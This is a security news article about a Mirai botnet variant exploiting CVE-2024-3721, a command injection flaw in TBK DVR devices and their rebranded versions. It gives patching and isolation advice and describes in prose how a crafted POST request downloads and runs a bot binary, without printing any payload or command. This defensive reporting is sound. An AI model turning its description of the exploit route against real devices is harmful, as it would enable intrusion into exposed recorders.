Mirai Botnet variant exploits TBK DVR Devices flaw
Take action: If you have TBK DVR devices (or rebranded versions like Novo, CeNova, QSee, Pulnix, Night OWL, etc.), make sure to isolate these devices from the internet. Then check for and apply any available firmware updates from your vendor to patch CVE-2024-3721. If the device has been exposed, consider performing a factory reset before isolating it in a protected network.
Learn More
Cybersecurity researchers are reporting a new variant of the Mirai botnet that is actively exploiting a command injection vulnerability in TBK DVR devices to build a botnet infrastructure.
The attack exploits CVE-2024-3721 (CVSS score 6.3), which allows remote attackers to execute arbitrary operating system commands on vulnerable TBK DVR-4104 and DVR-4216 digital video recording devices without proper authorization.
The vulnerability was originally disclosed by security researcher "netsecfish" in April 2024, who published a proof-of-concept demonstrating how attackers could achieve shell command execution through the manipulation of specific parameters in POST requests.
Kaspersky researchers detected active exploitation of CVE-2024-3721 in their Linux honeypot systems, where they observed unusual request patterns linked to the vulnerability. The attack begins with a specially crafted POST request containing a malicious command that functions as a single-line shell script. This script downloads and executes an ARM32 binary on the compromised device, establishing communication with command and control servers to enlist the device into the botnet swarm.
Rsearchers are identifying between 50,000 and 114,000 internet-exposed TBK DVR devices that are potentially vulnerable to exploitation. The attack has a global reach, with infection statistics showing that the majority of compromised devices are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.
The vulnerability's impact is compounded by the complex branding situation surrounding TBK DVR devices. The DVR-4104 and DVR-4216 models have been extensively rebranded under multiple names, including Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands. This rebranding makes it challenging to determine which devices are affected and whether security patches are available across all branded variants.
Currently, it remains unclear whether TBK Vision, the original manufacturer, has released security updates to address CVE-2024-3721. The availability of patches for affected devices is complicated by the extensive rebranding ecosystem, where different vendors may have varying update policies and timelines.
Security experts recommend applying firmware updates if available, implementing network-level access controls and isolation to restrict remote access to DVR devices, and conducting factory resets for confirmed vulnerable and exposed systems.
